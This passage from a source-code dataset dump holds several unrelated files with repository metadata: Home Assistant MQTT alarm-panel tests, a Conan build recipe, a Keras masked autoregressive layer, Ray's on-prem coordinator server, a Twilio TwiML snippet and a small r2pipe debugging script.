assert state.state == STATE_ALARM_TRIGGERED
async def test_trigger_with_specific_delay(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method and switch from pending to triggered."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"delay_time": 10,
"pending_time": 0,
"armed_away": {"delay_time": 1},
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_TRIGGERED
async def test_trigger_with_pending_and_delay(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method and switch from pending to triggered."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"delay_time": 1,
"pending_time": 0,
"triggered": {"pending_time": 1},
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future += timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_TRIGGERED
async def test_trigger_with_pending_and_specific_delay(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method and switch from pending to triggered."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"delay_time": 10,
"pending_time": 0,
"armed_away": {"delay_time": 1},
"triggered": {"pending_time": 1},
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future += timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_TRIGGERED
async def test_trigger_with_specific_pending(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test arm home method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 10,
"triggered": {"pending_time": 2},
"trigger_time": 3,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
future = dt_util.utcnow() + timedelta(seconds=2)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_no_disarm_after_trigger(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarm after trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"pending_time": 0,
"delay_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE, entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
async def test_arm_away_after_disabled_disarmed(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test pending state with and without zero trigger time."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"pending_time": 0,
"delay_time": 1,
"armed_away": {"pending_time": 1},
"disarmed": {"trigger_time": 0},
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["pre_pending_state"] == STATE_ALARM_DISARMED
assert state.attributes["post_pending_state"] == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["pre_pending_state"] == STATE_ALARM_DISARMED
assert state.attributes["post_pending_state"] == STATE_ALARM_ARMED_AWAY
future = dt_util.utcnow() + timedelta(seconds=1)
with freeze_time(future):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["pre_pending_state"] == STATE_ALARM_ARMED_AWAY
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future += timedelta(seconds=1)
with freeze_time(future):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_TRIGGERED
async def test_disarm_with_template_code(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Attempt to disarm with a valid or invalid template-based code."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code_template": '{{ "" if from_state == "disarmed" else "abc" }}',
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_home(hass, "def")
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_ARMED_HOME
with pytest.raises(HomeAssistantError, match=r"Invalid alarm code provided$"):
await common.async_alarm_disarm(hass, "def")
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_ARMED_HOME
await common.async_alarm_disarm(hass, "abc")
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_DISARMED
@pytest.mark.parametrize(
("config", "expected_state"),
[
("payload_arm_away", STATE_ALARM_ARMED_AWAY),
("payload_arm_custom_bypass", STATE_ALARM_ARMED_CUSTOM_BYPASS),
("payload_arm_home", STATE_ALARM_ARMED_HOME),
("payload_arm_night", STATE_ALARM_ARMED_NIGHT),
("payload_arm_vacation", STATE_ALARM_ARMED_VACATION),
],
)
async def test_arm_via_command_topic(
hass: HomeAssistant,
config,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Test arming via command topic."""
command = config[8:].upper()
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 1,
"state_topic": "alarm/state",
"command_topic": "alarm/command",
config: command,
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
# Fire the arm command via MQTT; ensure state changes to arming
async_fire_mqtt_message(hass, "alarm/command", command)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
# Fast-forward a little bit
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == expected_state
async def test_disarm_pending_via_command_topic(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarming pending alarm via command topic."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 1,
"state_topic": "alarm/state",
"command_topic": "alarm/command",
"payload_disarm": "DISARM",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
# Now that we're pending, receive a command to disarm
async_fire_mqtt_message(hass, "alarm/command", "DISARM")
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_state_changes_are_published_to_mqtt(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test publishing of MQTT messages when state changes."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 1,
"trigger_time": 1,
"state_topic": "alarm/state",
"command_topic": "alarm/command",
}
},
)
await hass.async_block_till_done()
# Component should send disarmed alarm state on startup
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_DISARMED, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Arm in home mode
await common.async_alarm_arm_home(hass)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_PENDING, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Fast-forward a little bit
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_ARMED_HOME, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Arm in away mode
await common.async_alarm_arm_away(hass)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_PENDING, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Fast-forward a little bit
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_ARMED_AWAY, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Arm in night mode
await common.async_alarm_arm_night(hass)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_PENDING, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Fast-forward a little bit
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_ARMED_NIGHT, 0, True
)
mqtt_mock.async_publish.reset_mock()
# Disarm
await common.async_alarm_disarm(hass)
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_called_once_with(
"alarm/state", STATE_ALARM_DISARMED, 0, True
)
async def test_no_mqtt(hass: HomeAssistant, caplog: pytest.LogCaptureFixture) -> None:
"""Test publishing of MQTT messages when state changes."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "manual_mqtt",
"name": "test",
"state_topic": "alarm/state",
"command_topic": "alarm/command",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id) is None
assert "MQTT integration is not available" in caplog.text
|
0ad89341c86dd734f2743db405d23ce2a7a509d3
|
549270020f6c8724e2ef1b12e38d11b025579f8d
|
/recipes/at-spi2-atk/all/conanfile.py
|
e8f187953a737e56e8be043b399e228a3a5d99b5
|
[
"MIT"
] |
permissive
|
conan-io/conan-center-index
|
1bcec065ccd65aa38b1fed93fbd94d9d5fe6bc43
|
3b17e69bb4e5601a850b6e006e44775e690bac33
|
refs/heads/master
| 2023-08-31T11:34:45.403978
| 2023-08-31T11:13:23
| 2023-08-31T11:13:23
| 204,671,232
| 844
| 1,820
|
MIT
| 2023-09-14T21:22:42
| 2019-08-27T09:43:58
|
Python
|
UTF-8
|
Python
| false
| false
| 3,080
|
py
|
conanfile.py
|
from conan import ConanFile
from conan.errors import ConanInvalidConfiguration
from conan.tools.files import get, rmdir
from conans import Meson
import os
required_conan_version = ">=1.33.0"
class AtSPI2AtkConan(ConanFile):
name = "at-spi2-atk"
description = "library that bridges ATK to At-Spi2 D-Bus service."
topics = ("conan", "atk", "accessibility")
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://gitlab.gnome.org/GNOME/at-spi2-atk"
license = "LGPL-2.1-or-later"
generators = "pkg_config"
settings = "os", "arch", "compiler", "build_type"
options = {
"shared": [True, False],
"fPIC": [True, False],
}
default_options = {
"shared": False,
"fPIC": True,
}
deprecated = "at-spi2-core"
_meson = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
def validate(self):
if self.settings.os not in ("Linux", "FreeBSD"):
raise ConanInvalidConfiguration("at-spi2-atk is only supported on Linux and FreeBSD")
if self.options.shared and (not self.options["glib"].shared
or not self.options["at-spi2-core"].shared
or not self.options["atk"].shared):
raise ConanInvalidConfiguration(
"Linking a shared library against static glib can cause unexpected behaviour."
)
def configure(self):
if self.options.shared:
del self.options.fPIC
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def build_requirements(self):
self.build_requires("meson/1.1.1")
self.build_requires('pkgconf/1.9.3')
def requirements(self):
self.requires("at-spi2-core/2.44.1")
self.requires("atk/2.38.0")
self.requires("glib/2.76.3")
self.requires("libxml2/2.11.4")
def source(self):
get(self, **self.conan_data["sources"][self.version],
strip_root=True, destination=self._source_subfolder)
def _configure_meson(self):
if self._meson:
return self._meson
self._meson = Meson(self)
args=[]
args.append('--wrap-mode=nofallback')
self._meson.configure(build_folder=self._build_subfolder, source_folder=self._source_subfolder, pkg_config_paths='.', args=args)
return self._meson
def build(self):
meson = self._configure_meson()
meson.build()
def package(self):
self.copy(pattern="COPYING", dst="licenses", src=self._source_subfolder)
meson = self._configure_meson()
meson.install()
rmdir(self, os.path.join(self.package_folder, 'lib', 'pkgconfig'))
def package_info(self):
self.cpp_info.libs = ['atk-bridge-2.0']
self.cpp_info.includedirs = [os.path.join('include', 'at-spi2-atk', '2.0')]
self.cpp_info.names['pkg_config'] = 'atk-bridge-2.0'
|
2ddc38540c9a237e3465e63db522bd333cba03be
|
a66149460eda1d5343ee8e94401d91f3f2270015
|
/notebooks/vae-inverse_autoregressive_flows/made.py
|
09faed76fb050911bf6ffc2779ada5e654de8b13
|
[
"MIT"
] |
permissive
|
bjlkeng/sandbox
|
59ae04a984f9a6a01caac78141250c9388e40574
|
3dac79472df6e895d6eb57f4fdbdaf2032ec0cf6
|
refs/heads/master
| 2023-09-01T03:06:34.845840
| 2023-08-18T01:11:43
| 2023-08-18T01:11:43
| 89,071,009
| 190
| 83
|
MIT
| 2023-08-18T01:13:22
| 2017-04-22T13:17:10
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 8,748
|
py
|
made.py
|
from random import randint
import numpy as np
from keras import backend as K
from keras.engine import Layer
from keras.layers import initializers
from keras.layers import activations
from keras.layers import regularizers
from keras.layers import constraints
class MaskingDense(Layer):
""" Just copied code from keras Dense layer and added masking and a few other tricks:
- Direct auto-regressive connections to output
- Allows a second (non-autoregressive) input that is fully connected to first hidden
- Either 1 output or 2 outputs (concatenated) that are separately
auto-regressive wrt to the input
"""
def __init__(self, units, out_units,
hidden_layers=1,
dropout_rate=0.0,
random_input_order=False,
activation='elu',
out_activation='sigmoid',
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
out_kernel_initializer='glorot_uniform',
out_bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
if 'input_shape' not in kwargs and 'input_dim' in kwargs:
kwargs['input_shape'] = (kwargs.pop('input_dim'),)
super(MaskingDense, self).__init__(**kwargs)
self.input_sel = None
self.random_input_order = random_input_order
self.rate = min(1., max(0., dropout_rate))
self.kernel_sels = []
self.units = units
self.out_units = out_units
self.hidden_layers = hidden_layers
self.activation = activations.get(activation)
self.out_activation = activations.get(activation)
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.out_kernel_initializer = initializers.get(out_kernel_initializer)
self.out_bias_initializer = initializers.get(out_bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
def dropout_wrapper(self, inputs, training):
if 0. < self.rate < 1.:
def dropped_inputs():
return K.dropout(inputs, self.rate, noise_shape=None, seed=None)
return K.in_train_phase(dropped_inputs, inputs,
training=training)
return inputs
def build_layer_weights(self, input_dim, units, use_bias=True, is_output=False):
kernel_initializer = (self.kernel_initializer if not is_output
else self.out_kernel_initializer)
bias_initializer = (self.bias_initializer if not is_output
else self.out_bias_initializer)
kernel = self.add_weight(shape=(input_dim, units),
initializer=kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
if use_bias:
bias = self.add_weight(shape=(units,),
initializer=bias_initializer,
name='bias',
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
else:
bias = None
return kernel, bias
def build_mask(self, shape, prev_sel, is_output):
if is_output:
if shape[-1] == len(self.input_sel):
input_sel = self.input_sel
else:
input_sel = self.input_sel * 2
else:
# Disallow D-1 because it would violate auto-regressive property
# Disallow unconnected units by sampling min from previous layer
input_sel = [randint(np.min(prev_sel), shape[-1] - 2) for i in range(shape[-1])]
def vals():
in_len = len(self.input_sel)
for x in range(shape[-2]):
for y in range(shape[-1]):
if is_output:
yield 1 if prev_sel[x] < input_sel[y % in_len] else 0
else:
yield 1 if prev_sel[x] <= input_sel[y] else 0
return K.constant(list(vals()), dtype='float32', shape=shape), input_sel
def build(self, input_shape):
if isinstance(input_shape, list):
if len(input_shape) != 2:
raise ValueError('Only list only supported for exactly two inputs')
input_shape, other_input_shape = input_shape
# Build weights for other (non-autoregressive) vector
other_shape = (other_input_shape[-1], self.units)
self.other_kernel, self.other_bias = self.build_layer_weights(*other_shape)
assert len(input_shape) >= 2
assert self.out_units == input_shape[-1] or self.out_units == 2 * input_shape[-1]
self.kernels, self.biases = [], []
self.kernel_masks, self.kernel_sels = [], []
shape = (input_shape[-1], self.units)
self.input_sel = np.arange(input_shape[-1])
if self.random_input_order:
np.random.shuffle(self.input_sel)
prev_sel = self.input_sel
for x in range(self.hidden_layers):
# Hidden layer
kernel, bias = self.build_layer_weights(*shape)
self.kernels.append(kernel)
self.biases.append(bias)
# Hidden layer mask
kernel_mask, kernel_sel = self.build_mask(shape, prev_sel, is_output=False)
self.kernel_masks.append(kernel_mask)
self.kernel_sels.append(kernel_sel)
prev_sel = kernel_sel
shape = (self.units, self.units)
# Direct connection between input/output
if self.hidden_layers > 0:
direct_shape = (input_shape[-1], self.out_units)
self.direct_kernel, _ = self.build_layer_weights(*direct_shape, use_bias=False,
is_output=True)
self.direct_kernel_mask, self.direct_sel = self.build_mask(direct_shape, self.input_sel,
is_output=True)
# Output layer
out_shape = (self.units, self.out_units)
self.out_kernel, self.out_bias = self.build_layer_weights(*out_shape, is_output=True)
self.out_kernel_mask, self.out_sel = self.build_mask(out_shape, prev_sel, is_output=True)
self.built = True
def call(self, inputs, training=None):
other_input = None
if isinstance(inputs, list):
assert len(inputs) == 2
assert self.hidden_layers > 0, "other input not supported if no hidden layers"
assert hasattr(self, 'other_kernel')
inputs, other_input = inputs
output = inputs
if other_input is not None:
other = K.dot(other_input, self.other_kernel)
other = K.bias_add(other, self.other_bias)
other = self.activation(other)
# Hidden layer + mask
for i in range(self.hidden_layers):
weight = self.kernels[i] * self.kernel_masks[i]
output = K.dot(output, weight)
# "other" input
if i == 0 and other_input is not None:
output = output + other
output = K.bias_add(output, self.biases[i])
output = self.activation(output)
output = self.dropout_wrapper(output, training)
# out_act(bias + (V dot M_v)h(x) + (A dot M_a)x + (other dot M_other)other)
output = K.dot(output, self.out_kernel * self.out_kernel_mask)
# Direct connection
if self.hidden_layers > 0:
direct = K.dot(inputs, self.direct_kernel * self.direct_kernel_mask)
output = output + direct
output = K.bias_add(output, self.out_bias)
output = self.out_activation(output)
output = self.dropout_wrapper(output, training)
return output
def compute_output_shape(self, input_shape):
if isinstance(input_shape, list):
input_shape = input_shape[0]
return (input_shape[0], self.out_units)
|
968595def93c6bd3bf3693f66e0509925a4381e2
|
0760fb4901a75766921a205b55686d6d6f049b30
|
/python/ray/autoscaler/local/coordinator_server.py
|
75c85b3966e54ea63980ea87a266cbd1e3d6fbb9
|
[
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
ray-project/ray
|
a4bb6940b08b59a61ef0b8e755a52d8563a2f867
|
edba68c3e7cf255d1d6479329f305adb7fa4c3ed
|
refs/heads/master
| 2023-08-31T03:36:48.164405
| 2023-08-31T03:20:38
| 2023-08-31T03:20:38
| 71,932,349
| 29,482
| 5,669
|
Apache-2.0
| 2023-09-14T21:48:14
| 2016-10-25T19:38:30
|
Python
|
UTF-8
|
Python
| false
| false
| 4,223
|
py
|
coordinator_server.py
|
"""Web server that runs on local/private clusters to coordinate and manage
different clusters for multiple users. It receives node provider function calls
through HTTP requests from remote CoordinatorSenderNodeProvider and runs them
locally in LocalNodeProvider. To start the webserver the user runs:
`python coordinator_server.py --ips <comma separated ips> --port <PORT>`."""
import argparse
import json
import logging
import socket
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
from ray.autoscaler._private.local.node_provider import LocalNodeProvider
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def runner_handler(node_provider):
class Handler(SimpleHTTPRequestHandler):
"""A custom handler for OnPremCoordinatorServer.
Handles all requests and responses coming into and from the
remote CoordinatorSenderNodeProvider.
"""
def _do_header(self, response_code=200, headers=None):
"""Sends the header portion of the HTTP response.
Args:
response_code: Standard HTTP response code
headers (list[tuples]): Standard HTTP response headers
"""
if headers is None:
headers = [("Content-type", "application/json")]
self.send_response(response_code)
for key, value in headers:
self.send_header(key, value)
self.end_headers()
def do_HEAD(self):
"""HTTP HEAD handler method."""
self._do_header()
def do_GET(self):
"""Processes requests from remote CoordinatorSenderNodeProvider."""
if self.headers["content-length"]:
raw_data = (
self.rfile.read(int(self.headers["content-length"]))
).decode("utf-8")
logger.info(
"OnPremCoordinatorServer received request: " + str(raw_data)
)
request = json.loads(raw_data)
response = getattr(node_provider, request["type"])(*request["args"])
logger.info(
"OnPremCoordinatorServer response content: " + str(raw_data)
)
response_code = 200
message = json.dumps(response)
self._do_header(response_code=response_code)
self.wfile.write(message.encode())
return Handler
class OnPremCoordinatorServer(threading.Thread):
"""Initializes HTTPServer and serves CoordinatorSenderNodeProvider forever.
It handles requests from the remote CoordinatorSenderNodeProvider. The
requests are forwarded to LocalNodeProvider function calls.
"""
def __init__(self, list_of_node_ips, host, port):
"""Initialize HTTPServer and serve forever by invoking self.run()."""
logger.info(
"Running on prem coordinator server on address " + host + ":" + str(port)
)
threading.Thread.__init__(self)
self._port = port
self._list_of_node_ips = list_of_node_ips
address = (host, self._port)
config = {"list_of_node_ips": list_of_node_ips}
self._server = HTTPServer(
address,
runner_handler(LocalNodeProvider(config, cluster_name=None)),
)
self.start()
def run(self):
self._server.serve_forever()
def shutdown(self):
"""Shutdown the underlying server."""
self._server.shutdown()
self._server.server_close()
def main():
parser = argparse.ArgumentParser(
description="Please provide a list of node ips and port."
)
parser.add_argument(
"--ips", required=True, help="Comma separated list of node ips."
)
parser.add_argument(
"--port",
type=int,
required=True,
help="The port on which the coordinator listens.",
)
args = parser.parse_args()
list_of_node_ips = args.ips.split(",")
OnPremCoordinatorServer(
list_of_node_ips=list_of_node_ips,
host=socket.gethostbyname(socket.gethostname()),
port=args.port,
)
if __name__ == "__main__":
main()
|
6683cc7b4c377515291f3efa98cd247f10940bfc
|
5dc35a39169d191166c44b7ac45389a14e5b0857
|
/twiml/voice/conference/conference-6/conference-6.8.x.py
|
9c8e558138288bc0cb3a09073c402295049e04f1
|
[
"MIT"
] |
permissive
|
TwilioDevEd/api-snippets
|
035b7ceaf9c03c932010919ee1747bf895d4591e
|
ca6160d8e626bdf137f783324807285bb01d006f
|
refs/heads/master
| 2023-08-17T19:20:35.751733
| 2023-08-04T18:47:58
| 2023-08-04T18:47:58
| 49,965,712
| 267
| 551
|
MIT
| 2023-09-11T14:04:34
| 2016-01-19T16:21:44
|
Java
|
UTF-8
|
Python
| false
| false
| 326
|
py
|
conference-6.8.x.py
|
from twilio.twiml.voice_response import Conference, Dial, VoiceResponse
response = VoiceResponse()
dial = Dial()
dial.conference(
'NoMusicNoBeepRoom',
beep=False,
wait_url='http://your-webhook-host.com',
start_conference_on_enter=True,
end_conference_on_exit=True
)
response.append(dial)
print(response)
|
e10d7d360d97a5a1e7f208be0d0bae4207c26805
|
9ea5689a6cbe7782b433f3e8da1f6533a757159f
|
/python/dbgtest.py
|
35f05deadad5ccefd00bbbe1e36e4a9d256dd92a
|
[
"MIT"
] |
permissive
|
radareorg/radare2-r2pipe
|
0b538429ed9155ccbf10bfc719036284d5bcb86f
|
3a1dba2db43832913f815f3af807f03125d82724
|
refs/heads/master
| 2023-08-31T00:14:51.679842
| 2023-08-27T15:59:30
| 2023-08-27T15:59:30
| 70,247,098
| 239
| 53
| null | 2022-11-25T10:23:57
| 2016-10-07T13:04:06
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 195
|
py
|
dbgtest.py
|
#!/usr/bin/env python3
import r2pipe
r2 = r2pipe.open("/bin/ls", ["-nd"])
for a in range(1, 10):
regs = r2.cmdj("drj")
print("0x%x 0x%x" % (regs["rip"], regs["rsp"]))
r2.cmd("ds")
|
28fcb45f6d78a19ccf57f466bff4649002aa3e7e
|
85b402cd9e762b2749c978105ea362b10d335e5c
|
/175-breast_cancer_without_PCA.py
|
399fddd2a7b76d52c29f8ed8b5a36e194fa3b658
|
[] |
no_license
|
bnsreenu/python_for_microscopists
|
29c08f17461baca95b5161fd4cd905be515605c4
|
4b8c0bd4274bc4d5e906a4952988c7f3e8db74c5
|
refs/heads/master
| 2023-09-04T21:11:25.524753
| 2023-08-24T18:40:53
| 2023-08-24T18:40:53
| 191,218,511
| 3,010
| 2,206
| null | 2023-07-25T07:15:22
| 2019-06-10T17:53:14
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
